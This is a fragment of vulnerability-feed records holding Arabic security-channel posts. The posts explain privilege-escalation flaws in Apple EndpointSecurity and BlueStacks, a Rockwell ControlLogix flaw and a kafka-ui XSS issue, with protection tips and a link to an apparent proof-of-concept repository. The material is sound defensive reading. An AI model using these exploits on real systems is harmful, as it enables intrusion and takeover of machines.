\u0643\u064a\u0641 \u062a\u062d\u0645\u064a \u0646\u0641\u0633\u0643:\n - \u062a\u062d\u062f\u064a\u062b \u0627\u0644\u0646\u0638\u0627\u0645: \u062a\u0623\u0643\u062f \u062f\u0627\u0626\u0645\u064b\u0627 \u0645\u0646 \u0623\u0646 \u0646\u0638\u0627\u0645 macOS \u0645\u062d\u062f\u062b \u0625\u0644\u0649 \u0622\u062e\u0631 \u0625\u0635\u062f\u0627\u0631\u060c \u062d\u064a\u062b \u064a\u062a\u0645 \u0625\u0635\u0644\u0627\u062d \u0627\u0644\u062b\u063a\u0631\u0627\u062a \u0641\u064a \u0627\u0644\u062a\u062d\u062f\u064a\u062b\u0627\u062a \u0627\u0644\u062c\u062f\u064a\u062f\u0629.\n - \u0627\u0644\u062d\u0630\u0631 \u0639\u0646\u062f \u062a\u0646\u0632\u064a\u0644 \u0627\u0644\u0628\u0631\u0627\u0645\u062c: \u0644\u0627 \u062a\u0642\u0645 \u0628\u062a\u0646\u0632\u064a\u0644 \u0623\u0648 \u062a\u062b\u0628\u064a\u062a \u0628\u0631\u0627\u0645\u062c \u0645\u0646 \u0645\u0635\u0627\u062f\u0631 \u063a\u064a\u0631 \u0645\u0648\u062b\u0648\u0642\u0629.\n - \u0627\u0633\u062a\u062e\u062f\u0627\u0645 \u0628\u0631\u0627\u0645\u062c \u0627\u0644\u062d\u0645\u0627\u064a\u0629: \u062a\u062b\u0628\u064a\u062a \u0628\u0631\u0627\u0645\u062c \u0627\u0644\u062d\u0645\u0627\u064a\u0629 \u0639\u0644\u0649 \u062c\u0647\u0627\u0632\u0643 \u064a\u0645\u0643\u0646 \u0623\u0646 \u064a\u0633\u0627\u0639\u062f \u0641\u064a \u0627\u0643\u062a\u0634\u0627\u0641 \u0648\u0625\u064a\u0642\u0627\u0641 \u0627\u0644\u0628\u0631\u0627\u0645\u062c \u0627\u0644\u0636\u0627\u0631\u0629.\n\n#### \u062e\u0644\u0627\u0635\u0629:\n\u0627\u0644\u062b\u063a\u0631\u0629 CVE-2019-8805 \u0641\u064a \u0625\u0637\u0627\u0631 \u0639\u0645\u0644 Apple EndpointSecurity \u062a\u064f\u0638\u0647\u0631 \u0643\u064a\u0641 \u064a\u0645\u0643\u0646 \u0644\u0644\u0645\u0647\u0627\u062c\u0645\u064a\u0646 \u0627\u0633\u062a\u063a\u0644\u0627\u0644 \u0627\u0644\u062b\u063a\u0631\u0627\u062a \u0644\u0632\u064a\u0627\u062f\u0629 \u0635\u0644\u0627\u062d\u064a\u0627\u062a\u0647\u0645 \u0639\u0644\u0649 \u0627\u0644\u0646\u0638\u0627\u0645. \u0645\u0646 \u0627\u0644\u0645\u0647\u0645 \u062a\u062d\u062f\u064a\u062b \u0627\u0644\u0646\u0638\u0627\u0645 \u0628\u0627\u0646\u062a\u0638\u0627\u0645 \u0648\u0627\u0644\u062d\u0630\u0631 \u0639\u0646\u062f \u062a\u0646\u0632\u064a\u0644 \u0627\u0644\u0628\u0631\u0627\u0645\u062c \u0644\u062d\u0645\u0627\u064a\u0629 \u0646\u0641\u0633\u0643 \u0645\u0646 \u0647\u0630\u0647 \u0627\u0644\u0647\u062c\u0645\u0627\u062a.\n\nALSED404:\n\u062a\u0645 \u0627\u0644\u0639\u062b\u0648\u0631 \u0639\u0644\u0649 \u062b\u063a\u0631\u0629 \u0623\u0645\u0646\u064a\u0629 \u0639\u0627\u0644\u064a\u0629 \u0627\u0644\u062e\u0637\u0648\u0631\u0629 (CVE-2024-6242) \u0641\u064a \u0623\u062c\u0647\u0632\u0629 Rockwell Automation ControlLogix 1756.\n\n\u0642\u062f \u064a\u0624\u062f\u064a \u0627\u0633\u062a\u063a\u0644\u0627\u0644 \u0647\u0630\u0647 \u0627\u0644\u062b\u063a\u0631\u0629 \u0627\u0644\u0623\u0645\u0646\u064a\u0629 \u0625\u0644\u0649 \u0625\u0635\u062f\u0627\u0631 \u0623\u0648\u0627\u0645\u0631 CIP \u063a\u064a\u0631 \u0645\u0635\u0631\u062d \u0628\u0647\u0627\u060c \u0645\u0645\u0627 \u064a\u0624\u062b\u0631 \u0639\u0644\u0649 \u062a\u0643\u0648\u064a\u0646\u0627\u062a \u0627\u0644\u062c\u0647\u0627\u0632 \u0648\u0645\u0634\u0627\u0631\u064a\u0639 \u0627\u0644\u0645\u0633\u062a\u062e\u062f\u0645.\n\u0627\u0642\u0631\u0623: https://thehackernews.com/2024/08/critical-flaw-in-rockwell-automation.html\n\nThe Smart Shadow:\n\u0646\u0638\u0631\u0629 \u0639\u0627\u0645\u0629 \u0639\u0644\u0649 \u0627\u0644\u062a\u0642\u0631\u064a\u0631\n\u0627\u0644\u062a\u0642\u0631\u064a\u0631 \u0627\u0644\u0630\u064a \u0623\u0634\u0631\u062a \u0625\u0644\u064a\u0647 \u064a\u062a\u062d\u062f\u062b \u0639\u0646 \u062b\u063a\u0631\u0627\u062a \u0623\u0645\u0646\u064a\u0629 \u0641\u064a \u062a\u0637\u0628\u064a\u0642 kafka-ui\u060c \u0648\u0647\u064a \u0648\u0627\u062c\u0647\u0629 \u0645\u0633\u062a\u062e\u062f\u0645 \u0644\u0625\u062f\u0627\u0631\u0629 Apache Kafka. \u0627\u0644\u062a\u0642\u0631\u064a\u0631 \u064a\u0648\u0636\u062d \u0646\u0648\u0639\u064a\u0646 \u0645\u0646 \u0627\u0644\u062b\u063a\u0631\u0627\u062a:\n\n1. GHSL-2023-229: \u062b\u063a\u0631\u0629 XSS (Cross-Site Scripting)\n2. GHSL-2023-230: \u062b\u063a\u0631\u0629 \u0623\u062e\u0631\u0649 \u0644\u0645 \u064a\u062a\u0645 \u062a\u062d\u062f\u064a\u062f \u0646\u0648\u0639\u0647\u0627 \u0628\u0634\u0643\u0644 \u0648\u0627\u0636\u062d \u0641\u064a \u0627\u0644\u0639\u0646\u0648\u0627\u0646\n\n### GHSL-2023-229: \u062b\u063a\u0631\u0629 XSS\n\u062b\u063a\u0631\u0629 XSS \u062a\u062d\u062f\u062b \u0639\u0646\u062f\u0645\u0627 \u064a\u062a\u0645\u0643\u0646 \u0627\u0644\u0645\u0647\u0627\u062c\u0645 \u0645\u0646 \u062d\u0642\u0646 \u0634\u064a\u0641\u0631\u0629 JavaScript \u0636\u0627\u0631\u0629 \u0641\u064a \u0635\u0641\u062d\u0629 \u0648\u064a\u0628\u060c \u0648\u0627\u0644\u062a\u064a \u064a\u062a\u0645 \u062a\u0646\u0641\u064a\u0630\u0647\u0627 \u0641\u064a \u0645\u062a\u0635\u0641\u062d \u0627\u0644\u0636\u062d\u064a\u0629.\n\n#### \u0627\u0644\u0637\u0631\u064a\u0642\u0629 \u0627\u0644\u0636\u0639\u064a\u0641\u0629 (Vulnerable method):\n\u0644\u0646\u0641\u062a\u0631\u0636 \u0623\u0646 \u0644\u062f\u064a\u0646\u0627 \u0637\u0631\u064a\u0642\u0629 \u0641\u064a \u0627\u0644\u0643\u0648\u062f \u062a\u0639\u0631\u0636 \u0645\u062f\u062e\u0644\u0627\u062a \u0627\u0644\u0645\u0633\u062a\u062e\u062f\u0645 \u0645\u0628\u0627\u0634\u0631\u0629 \u0641\u064a \u0635\u0641\u062d\u0629 HTML \u062f\u0648\u0646 \u062a\u0646\u0642\u064a\u0629:", "creation_timestamp": "2024-12-13T19:00:22.000000Z"} {"uuid": "51ca8f8b-aeb4-43c0-b549-e8a1f5fad200", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-33352", "type": "seen", "source": "https://t.me/cyber_hsecurity/1613", "content": "3. \u062a\u0635\u0639\u064a\u062f \u0627\u0644\u0627\u0645\u062a\u064a\u0627\u0632\u0627\u062a:\n - \u064a\u0633\u062a\u063a\u0644 \u0627\u0644\u0643\u0648\u062f \u0627\u0644\u0636\u0627\u0631 \u0627\u0644\u062b\u063a\u0631\u0629 \u0627\u0644\u0623\u0645\u0646\u064a\u0629 \u0644\u062a\u0635\u0639\u064a\u062f \u0627\u0644\u0627\u0645\u062a\u064a\u0627\u0632\u0627\u062a \u0645\u0646 \u062f\u0627\u062e\u0644 \u0627\u0644\u0622\u0644\u0629 \u0627\u0644\u0627\u0641\u062a\u0631\u0627\u0636\u064a\u0629 \u0625\u0644\u0649 \u0646\u0638\u0627\u0645 \u0627\u0644\u062a\u0634\u063a\u064a\u0644 \u0627\u0644\u0645\u0636\u064a\u0641 (host operating system). \u0647\u0630\u0627 \u064a\u0645\u0643\u0646 \u0627\u0644\u0645\u0647\u0627\u062c\u0645 \u0645\u0646 \u0627\u0644\u062d\u0635\u0648\u0644 \u0639\u0644\u0649 \u0635\u0644\u0627\u062d\u064a\u0627\u062a \u0627\u0644\u0645\u062f\u064a\u0631 \u0648\u062a\u0646\u0641\u064a\u0630 \u0623\u0648\u0627\u0645\u0631 \u0636\u0627\u0631\u0629 \u0639\u0644\u0649 \u062c\u0647\u0627\u0632 \u0627\u0644\u0643\u0645\u0628\u064a\u0648\u062a\u0631.\n\n\u0643\u064a\u0641\u064a\u0629 \u0627\u0644\u062d\u0645\u0627\u064a\u0629 \u0645\u0646 \u0627\u0644\u062b\u063a\u0631\u0629 \u0627\u0644\u0623\u0645\u0646\u064a\u0629 CVE-2024-33352\u061f\n\n\u0644\u062d\u0645\u0627\u064a\u0629 \u0646\u0641\u0633\u0643 \u0645\u0646 \u0647\u0630\u0647 \u0627\u0644\u062b\u063a\u0631\u0629 \u0627\u0644\u0623\u0645\u0646\u064a\u0629\u060c \u064a\u062c\u0628 \u0627\u062a\u0628\u0627\u0639 \u0627\u0644\u062e\u0637\u0648\u0627\u062a \u0627\u0644\u062a\u0627\u0644\u064a\u0629:\n\n1. \u062a\u062d\u062f\u064a\u062b BlueStacks:\n - \u062a\u0623\u0643\u062f \u0645\u0646 \u062a\u062d\u062f\u064a\u062b BlueStacks \u0625\u0644\u0649 \u0623\u062d\u062f\u062b \u0625\u0635\u062f\u0627\u0631 \u064a\u062d\u062a\u0648\u064a \u0639\u0644\u0649 \u062a\u0635\u062d\u064a\u062d\u0627\u062a \u0627\u0644\u0623\u0645\u0627\u0646 \u0627\u0644\u0644\u0627\u0632\u0645\u0629. \u062a\u0642\u0648\u0645 \u0627\u0644\u0634\u0631\u0643\u0629 \u0627\u0644\u0645\u0637\u0648\u0631\u0629 \u0628\u0625\u0635\u062f\u0627\u0631 \u062a\u062d\u062f\u064a\u062b\u0627\u062a \u062f\u0648\u0631\u064a\u0629 \u0644\u0645\u0639\u0627\u0644\u062c\u0629 \u0627\u0644\u062b\u063a\u0631\u0627\u062a \u0627\u0644\u0623\u0645\u0646\u064a\u0629.\n\n2. \u0627\u0633\u062a\u062e\u062f\u0627\u0645 \u0628\u0631\u0627\u0645\u062c \u0645\u0643\u0627\u0641\u062d\u0629 \u0627\u0644\u0641\u064a\u0631\u0648\u0633\u0627\u062a:\n - \u0627\u0633\u062a\u062e\u062f\u0645 \u0628\u0631\u0627\u0645\u062c \u0645\u0643\u0627\u0641\u062d\u0629 \u0627\u0644\u0641\u064a\u0631\u0648\u0633\u0627\u062a \u0627\u0644\u0645\u062d\u062f\u062b\u0629 \u0644\u0644\u0643\u0634\u0641 \u0639\u0646 \u0627\u0644\u062a\u0637\u0628\u064a\u0642\u0627\u062a \u0627\u0644\u0636\u0627\u0631\u0629 \u0648\u0645\u0646\u0639\u0647\u0627 \u0645\u0646 \u0627\u0644\u062a\u0634\u063a\u064a\u0644 \u062f\u0627\u062e\u0644 BlueStacks.\n\n3. \u062a\u062c\u0646\u0628 \u062a\u0646\u0632\u064a\u0644 \u0627\u0644\u062a\u0637\u0628\u064a\u0642\u0627\u062a \u0645\u0646 \u0645\u0635\u0627\u062f\u0631 \u063a\u064a\u0631 \u0645\u0648\u062b\u0648\u0642\u0629:\n - \u0642\u0645 \u0628\u062a\u0646\u0632\u064a\u0644 \u0627\u0644\u062a\u0637\u0628\u064a\u0642\u0627\u062a \u0641\u0642\u0637 \u0645\u0646 \u0645\u062a\u0627\u062c\u0631 \u0627\u0644\u062a\u0637\u0628\u064a\u0642\u0627\u062a \u0627\u0644\u0645\u0648\u062b\u0648\u0642\u0629 \u0645\u062b\u0644 Google Play. \u062a\u062c\u0646\u0628 \u062a\u0646\u0632\u064a\u0644 \u0627\u0644\u062a\u0637\u0628\u064a\u0642\u0627\u062a \u0645\u0646 \u0645\u0635\u0627\u062f\u0631 \u063a\u064a\u0631 \u0645\u0639\u0631\u0648\u0641\u0629 \u0623\u0648 \u0645\u0634\u0628\u0648\u0647\u0629.\n\n\u0627\u0644\u062e\u0644\u0627\u0635\u0629:\n\n\u062a\u0639\u062a\u0628\u0631 \u0627\u0644\u062b\u063a\u0631\u0629 \u0627\u0644\u0623\u0645\u0646\u064a\u0629 CVE-2024-33352 \u0641\u064a BlueStacks \u062a\u0647\u062f\u064a\u062f\u064b\u0627 \u062e\u0637\u064a\u0631\u064b\u0627 \u064a\u0645\u0643\u0646 \u0623\u0646 \u064a\u0633\u062a\u063a\u0644\u0647 \u0627\u0644\u0645\u0647\u0627\u062c\u0645\u0648\u0646 \u0644\u062a\u0635\u0639\u064a\u062f \u0627\u0644\u0627\u0645\u062a\u064a\u0627\u0632\u0627\u062a \u0648\u062a\u0646\u0641\u064a\u0630 \u0623\u0648\u0627\u0645\u0631 \u0636\u0627\u0631\u0629 \u0639\u0644\u0649 \u062c\u0647\u0627\u0632 \u0627\u0644\u0643\u0645\u0628\u064a\u0648\u062a\u0631. \u0645\u0646 \u0627\u0644\u0645\u0647\u0645 \u0623\u0646 \u062a\u0643\u0648\u0646 \u0639\u0644\u0649 \u062f\u0631\u0627\u064a\u0629 \u0628\u0647\u0630\u0647 \u0627\u0644\u062b\u063a\u0631\u0629 \u0648\u062a\u062a\u062e\u0630 \u0627\u0644\u0625\u062c\u0631\u0627\u0621\u0627\u062a \u0627\u0644\u0644\u0627\u0632\u0645\u0629 \u0644\u062d\u0645\u0627\u064a\u0629 \u0646\u0641\u0633\u0643\u060c \u0645\u062b\u0644 \u062a\u062d\u062f\u064a\u062b \u0627\u0644\u0628\u0631\u0627\u0645\u062c \u0648\u0627\u0633\u062a\u062e\u062f\u0627\u0645 \u0628\u0631\u0627\u0645\u062c \u0645\u0643\u0627\u0641\u062d\u0629 \u0627\u0644\u0641\u064a\u0631\u0648\u0633\u0627\u062a \u0648\u062a\u062c\u0646\u0628 \u062a\u0646\u0632\u064a\u0644 \u0627\u0644\u062a\u0637\u0628\u064a\u0642\u0627\u062a \u0645\u0646 \u0645\u0635\u0627\u062f\u0631 \u063a\u064a\u0631 \u0645\u0648\u062b\u0648\u0642\u0629.\n\n\nhttps://github.com/mmiszczyk/CVE-2024-33352\n\nABO TURAB:\n### CVE-2019-8805: \u062a\u0635\u0639\u064a\u062f \u0627\u0644\u0627\u0645\u062a\u064a\u0627\u0632\u0627\u062a \u0641\u064a \u0625\u0637\u0627\u0631 \u0639\u0645\u0644 Apple EndpointSecurity\n\n#### \u0645\u0642\u062f\u0645\u0629:\n\u0627\u0644\u0645\u0642\u0627\u0644\u0629 \u062a\u062a\u0646\u0627\u0648\u0644 \u062b\u063a\u0631\u0629 \u0623\u0645\u0646\u064a\u0629 \u0641\u064a \u0625\u0637\u0627\u0631 \u0639\u0645\u0644 EndpointSecurity \u0627\u0644\u062e\u0627\u0635 \u0628\u0634\u0631\u0643\u0629 Apple\u060c \u062a\u064f\u0639\u0631\u0641 \u0628\u0627\u0633\u0645 CVE-2019-8805. \u0647\u0630\u0647 \u0627\u0644\u062b\u063a\u0631\u0629 \u062a\u0633\u0645\u062d \u0644\u0644\u0645\u0647\u0627\u062c\u0645\u064a\u0646 \u0628\u0632\u064a\u0627\u062f\u0629 \u0635\u0644\u0627\u062d\u064a\u0627\u062a\u0647\u0645 \u0639\u0644\u0649 \u0627\u0644\u0646\u0638\u0627\u0645\u060c \u0645\u0645\u0627 \u064a\u0645\u0646\u062d\u0647\u0645 \u0627\u0644\u0642\u062f\u0631\u0629 \u0639\u0644\u0649 \u062a\u0646\u0641\u064a\u0630 \u062a\u0639\u0644\u064a\u0645\u0627\u062a \u0628\u0631\u0645\u062c\u064a\u0629 \u0643\u0645\u0633\u0624\u0648\u0644 \u0627\u0644\u0646\u0638\u0627\u0645.\n\n#### \u0627\u0644\u0646\u0642\u0627\u0637 \u0627\u0644\u0631\u0626\u064a\u0633\u064a\u0629:\n\n1. \u0645\u0627 \u0647\u064a \u0627\u0644\u062b\u063a\u0631\u0629 (CVE-2019-8805):\n - \u062a\u0639\u0631\u064a\u0641: CVE-2019-8805 \u0647\u064a \u062b\u063a\u0631\u0629 \u0641\u064a \u0625\u0637\u0627\u0631 \u0639\u0645\u0644 EndpointSecurity \u0627\u0644\u062e\u0627\u0635 \u0628\u0646\u0638\u0627\u0645 macOS\u060c \u0648\u0627\u0644\u062a\u064a \u064a\u0645\u0643\u0646 \u0627\u0633\u062a\u063a\u0644\u0627\u0644\u0647\u0627 \u0644\u062a\u0635\u0639\u064a\u062f \u0627\u0644\u0627\u0645\u062a\u064a\u0627\u0632\u0627\u062a.\n - \u0643\u064a\u0641 \u062a\u0639\u0645\u0644: \u0627\u0644\u062b\u063a\u0631\u0629 \u062a\u0633\u0645\u062d \u0644\u0644\u0645\u0647\u0627\u062c\u0645\u064a\u0646 \u0628\u062a\u062c\u0627\u0648\u0632 \u0642\u064a\u0648\u062f \u0627\u0644\u0623\u0645\u0627\u0646 \u0648\u0627\u0644\u062d\u0635\u0648\u0644 \u0639\u0644\u0649 \u0635\u0644\u0627\u062d\u064a\u0627\u062a \u0623\u0639\u0644\u0649 \u0639\u0644\u0649 \u0627\u0644\u0646\u0638\u0627\u0645\u060c \u0645\u0645\u0627 \u064a\u0645\u0643\u0646\u0647\u0645 \u0645\u0646 \u062a\u0646\u0641\u064a\u0630 \u062a\u0639\u0644\u064a\u0645\u0627\u062a \u0628\u0631\u0645\u062c\u064a\u0629 \u0628\u0627\u0645\u062a\u064a\u0627\u0632\u0627\u062a \u0627\u0644\u0645\u0633\u0624\u0648\u0644.\n\n2. \u0643\u064a\u0641 \u064a\u062a\u0645 \u0627\u0633\u062a\u063a\u0644\u0627\u0644 \u0627\u0644\u062b\u063a\u0631\u0629:\n - \u0627\u0644\u0627\u0633\u062a\u063a\u0644\u0627\u0644 \u0627\u0644\u0645\u062d\u0644\u064a: \u064a\u062c\u0628 \u0623\u0646 \u064a\u0643\u0648\u0646 \u0627\u0644\u0645\u0647\u0627\u062c\u0645 \u0642\u0627\u062f\u0631\u064b\u0627 \u0639\u0644\u0649 \u0627\u0644\u0648\u0635\u0648\u0644 \u0625\u0644\u0649 \u0627\u0644\u062c\u0647\u0627\u0632 \u0627\u0644\u0645\u0633\u062a\u0647\u062f\u0641. \u064a\u0645\u0643\u0646 \u0623\u0646 \u064a\u062d\u062f\u062b \u0630\u0644\u0643 \u0625\u0630\u0627 \u0643\u0627\u0646 \u0627\u0644\u0645\u0647\u0627\u062c\u0645 \u0642\u062f \u062d\u0635\u0644 \u0628\u0627\u0644\u0641\u0639\u0644 \u0639\u0644\u0649 \u0648\u0635\u0648\u0644 \u0645\u062d\u062f\u0648\u062f \u0625\u0644\u0649 \u0627\u0644\u062c\u0647\u0627\u0632.\n - \u062a\u0646\u0641\u064a\u0630 \u0627\u0644\u062a\u0639\u0644\u064a\u0645\u0627\u062a \u0627\u0644\u0628\u0631\u0645\u062c\u064a\u0629: \u0627\u0644\u0645\u0647\u0627\u062c\u0645 \u064a\u0633\u062a\u063a\u0644 \u0627\u0644\u062b\u063a\u0631\u0629 \u0644\u062a\u0646\u0641\u064a\u0630 \u062a\u0639\u0644\u064a\u0645\u0627\u062a \u0628\u0631\u0645\u062c\u064a\u0629 \u0636\u0627\u0631\u0629 \u0628\u0627\u0645\u062a\u064a\u0627\u0632\u0627\u062a \u0623\u0639\u0644\u0649\u060c \u0645\u0645\u0627 \u064a\u0645\u0646\u062d\u0647 \u0627\u0644\u0633\u064a\u0637\u0631\u0629 \u0627\u0644\u0643\u0627\u0645\u0644\u0629 \u0639\u0644\u0649 \u0627\u0644\u062c\u0647\u0627\u0632.\n\n3. \u0623\u0645\u062b\u0644\u0629 \u0628\u0633\u064a\u0637\u0629:\n - \u0645\u062b\u0627\u0644 1: \u0644\u0646\u0641\u062a\u0631\u0636 \u0623\u0646 \u0647\u0646\u0627\u0643 \u0645\u0648\u0638\u0641\u064b\u0627 \u064a\u064f\u062f\u0639\u0649 \u0623\u062d\u0645\u062f \u064a\u0639\u0645\u0644 \u0639\u0644\u0649 \u062c\u0647\u0627\u0632 macOS. \u0623\u062d\u0645\u062f \u064a\u0641\u062a\u062d \u0645\u0631\u0641\u0642 \u0628\u0631\u064a\u062f \u0625\u0644\u0643\u062a\u0631\u0648\u0646\u064a \u064a\u062d\u062a\u0648\u064a \u0639\u0644\u0649 \u0628\u0631\u0646\u0627\u0645\u062c \u0636\u0627\u0631. \u0627\u0644\u0628\u0631\u0646\u0627\u0645\u062c \u064a\u0633\u062a\u063a\u0644 \u0627\u0644\u062b\u063a\u0631\u0629 CVE-2019-8805 \u0644\u0632\u064a\u0627\u062f\u0629 \u0635\u0644\u0627\u062d\u064a\u0627\u062a\u0647\u060c \u0645\u0645\u0627 \u064a\u0645\u0646\u062d \u0627\u0644\u0645\u0647\u0627\u062c\u0645 \u0627\u0644\u0642\u062f\u0631\u0629 \u0639\u0644\u0649 \u0627\u0644\u062a\u062d\u0643\u0645 \u0627\u0644\u0643\u0627\u0645\u0644 \u0641\u064a \u062c\u0647\u0627\u0632 \u0623\u062d\u0645\u062f.\n - \u0645\u062b\u0627\u0644 2: \u0633\u0627\u0631\u0629 \u062a\u0642\u0648\u0645 \u0628\u062a\u0646\u0632\u064a\u0644 \u062a\u0637\u0628\u064a\u0642 \u0645\u0646 \u0645\u0635\u062f\u0631 \u063a\u064a\u0631 \u0645\u0648\u062b\u0648\u0642. \u0627\u0644\u062a\u0637\u0628\u064a\u0642 \u064a\u062d\u062a\u0648\u064a \u0639\u0644\u0649 \u062a\u0639\u0644\u064a\u0645\u0627\u062a \u0628\u0631\u0645\u062c\u064a\u0629 \u062a\u0633\u062a\u063a\u0644 \u0627\u0644\u062b\u063a\u0631\u0629 CVE-2019-8805. \u0628\u0645\u062c\u0631\u062f \u062a\u062b\u0628\u064a\u062a \u0627\u0644\u062a\u0637\u0628\u064a\u0642\u060c \u064a\u062a\u0645\u0643\u0646 \u0627\u0644\u0645\u0647\u0627\u062c\u0645 \u0645\u0646 \u0627\u0644\u0648\u0635\u0648\u0644 \u0625\u0644\u0649 \u0645\u0644\u0641\u0627\u062a \u0627\u0644\u0646\u0638\u0627\u0645 \u0627\u0644\u062d\u0633\u0627\u0633\u0629 \u0648\u062a\u0646\u0641\u064a\u0630 \u062a\u0639\u0644\u064a\u0645\u0627\u062a \u0628\u0631\u0645\u062c\u064a\u0629 \u0643\u0645\u0633\u0624\u0648\u0644.\n\n4. \u0643\u064a\u0641 \u062a\u062d\u0645\u064a \u0646\u0641\u0633\u0643:\n - \u062a\u062d\u062f\u064a\u062b \u0627\u0644\u0646\u0638\u0627\u0645: \u062a\u0623\u0643\u062f \u062f\u0627\u0626\u0645\u064b\u0627 \u0645\u0646 \u0623\u0646 \u0646\u0638\u0627\u0645 macOS \u0645\u062d\u062f\u062b \u0625\u0644\u0649 \u0622\u062e\u0631 \u0625\u0635\u062f\u0627\u0631\u060c \u062d\u064a\u062b \u064a\u062a\u0645 \u0625\u0635\u0644\u0627\u062d \u0627\u0644\u062b\u063a\u0631\u0627\u062a \u0641\u064a \u0627\u0644\u062a\u062d\u062f\u064a\u062b\u0627\u062a \u0627\u0644\u062c\u062f\u064a\u062f\u0629.\n - \u0627\u0644\u062d\u0630\u0631 \u0639\u0646\u062f \u062a\u0646\u0632\u064a\u0644 \u0627\u0644\u0628\u0631\u0627\u0645\u062c: \u0644\u0627 \u062a\u0642\u0645 \u0628\u062a\u0646\u0632\u064a\u0644 \u0623\u0648 \u062a\u062b\u0628\u064a\u062a \u0628\u0631\u0627\u0645\u062c \u0645\u0646 \u0645\u0635\u0627\u062f\u0631 \u063a\u064a\u0631 \u0645\u0648\u062b\u0648\u0642\u0629.\n - \u0627\u0633\u062a\u062e\u062f\u0627\u0645 \u0628\u0631\u0627\u0645\u062c \u0627\u0644\u062d\u0645\u0627\u064a\u0629: \u062a\u062b\u0628\u064a\u062a \u0628\u0631\u0627\u0645\u062c \u0627\u0644\u062d\u0645\u0627\u064a\u0629 \u0639\u0644\u0649 \u062c\u0647\u0627\u0632\u0643 \u064a\u0645\u0643\u0646 \u0623\u0646 \u064a\u0633\u0627\u0639\u062f \u0641\u064a \u0627\u0643\u062a\u0634\u0627\u0641 \u0648\u0625\u064a\u0642\u0627\u0641 \u0627\u0644\u0628\u0631\u0627\u0645\u062c \u0627\u0644\u0636\u0627\u0631\u0629.\n\n#### \u062e\u0644\u0627\u0635\u0629:\n\u0627\u0644\u062b\u063a\u0631\u0629 CVE-2019-8805 \u0641\u064a \u0625\u0637\u0627\u0631 \u0639\u0645\u0644 Apple EndpointSecurity \u062a\u064f\u0638\u0647\u0631 \u0643\u064a\u0641 \u064a\u0645\u0643\u0646 \u0644\u0644\u0645\u0647\u0627\u062c\u0645\u064a\u0646 \u0627\u0633\u062a\u063a\u0644\u0627\u0644 \u0627\u0644\u062b\u063a\u0631\u0627\u062a \u0644\u0632\u064a\u0627\u062f\u0629 \u0635\u0644\u0627\u062d\u064a\u0627\u062a\u0647\u0645 \u0639\u0644\u0649 \u0627\u0644\u0646\u0638\u0627\u0645. \u0645\u0646 \u0627\u0644\u0645\u0647\u0645 \u062a\u062d\u062f\u064a\u062b \u0627\u0644\u0646\u0638\u0627\u0645 \u0628\u0627\u0646\u062a\u0638\u0627\u0645 \u0648\u0627\u0644\u062d\u0630\u0631 \u0639\u0646\u062f \u062a\u0646\u0632\u064a\u0644 \u0627\u0644\u0628\u0631\u0627\u0645\u062c \u0644\u062d\u0645\u0627\u064a\u0629 \u0646\u0641\u0633\u0643 \u0645\u0646 \u0647\u0630\u0647 \u0627\u0644\u0647\u062c\u0645\u0627\u062a.\n\nALSED404:\n\u062a\u0645 \u0627\u0644\u0639\u062b\u0648\u0631 \u0639\u0644\u0649 \u062b\u063a\u0631\u0629 \u0623\u0645\u0646\u064a\u0629 \u0639\u0627\u0644\u064a\u0629 \u0627\u0644\u062e\u0637\u0648\u0631\u0629 (CVE-2024-6242) \u0641\u064a \u0623\u062c\u0647\u0632\u0629 Rockwell Automation ControlLogix 1756.\n\n\u0642\u062f \u064a\u0624\u062f\u064a \u0627\u0633\u062a\u063a\u0644\u0627\u0644 \u0647\u0630\u0647 \u0627\u0644\u062b\u063a\u0631\u0629 \u0627\u0644\u0623\u0645\u0646\u064a\u0629 \u0625\u0644\u0649 \u0625\u0635\u062f\u0627\u0631 \u0623\u0648\u0627\u0645\u0631 CIP \u063a\u064a\u0631 \u0645\u0635\u0631\u062d \u0628\u0647\u0627\u060c \u0645\u0645\u0627 \u064a\u0624\u062b\u0631 \u0639\u0644\u0649 \u062a\u0643\u0648\u064a\u0646\u0627\u062a \u0627\u0644\u062c\u0647\u0627\u0632 \u0648\u0645\u0634\u0627\u0631\u064a\u0639 \u0627\u0644\u0645\u0633\u062a\u062e\u062f\u0645.\n\u0627\u0642\u0631\u0623: https://thehackernews.com/2024/08/critical-flaw-in-rockwell-automation.html\n\nThe Smart Shadow:\n\u0646\u0638\u0631\u0629 \u0639\u0627\u0645\u0629 \u0639\u0644\u0649 \u0627\u0644\u062a\u0642\u0631\u064a\u0631\n\u0627\u0644\u062a\u0642\u0631\u064a\u0631 \u0627\u0644\u0630\u064a \u0623\u0634\u0631\u062a \u0625\u0644\u064a\u0647 \u064a\u062a\u062d\u062f\u062b \u0639\u0646 \u062b\u063a\u0631\u0627\u062a \u0623\u0645\u0646\u064a\u0629 \u0641\u064a \u062a\u0637\u0628\u064a\u0642 kafka-ui\u060c \u0648\u0647\u064a \u0648\u0627\u062c\u0647\u0629 \u0645\u0633\u062a\u062e\u062f\u0645 \u0644\u0625\u062f\u0627\u0631\u0629 Apache Kafka. \u0627\u0644\u062a\u0642\u0631\u064a\u0631 \u064a\u0648\u0636\u062d \u0646\u0648\u0639\u064a\u0646 \u0645\u0646 \u0627\u0644\u062b\u063a\u0631\u0627\u062a:\n\n1. GHSL-2023-229: \u062b\u063a\u0631\u0629 XSS (Cross-Site Scripting)\n2. GHSL-2023-230: \u062b\u063a\u0631\u0629 \u0623\u062e\u0631\u0649 \u0644\u0645 \u064a\u062a\u0645 \u062a\u062d\u062f\u064a\u062f \u0646\u0648\u0639\u0647\u0627 \u0628\u0634\u0643\u0644 \u0648\u0627\u0636\u062d \u0641\u064a \u0627\u0644\u0639\u0646\u0648\u0627\u0646\n\n### GHSL-2023-229: \u062b\u063a\u0631\u0629 XSS\n\u062b\u063a\u0631\u0629 XSS \u062a\u062d\u062f\u062b \u0639\u0646\u062f\u0645\u0627 \u064a\u062a\u0645\u0643\u0646 \u0627\u0644\u0645\u0647\u0627\u062c\u0645 \u0645\u0646 \u062d\u0642\u0646 \u0634\u064a\u0641\u0631\u0629 JavaScript \u0636\u0627\u0631\u0629 \u0641\u064a \u0635\u0641\u062d\u0629 \u0648\u064a\u0628\u060c \u0648\u0627\u0644\u062a\u064a \u064a\u062a\u0645 \u062a\u0646\u0641\u064a\u0630\u0647\u0627 \u0641\u064a \u0645\u062a\u0635\u0641\u062d \u0627\u0644\u0636\u062d\u064a\u0629.\n\n#### \u0627\u0644\u0637\u0631\u064a\u0642\u0629 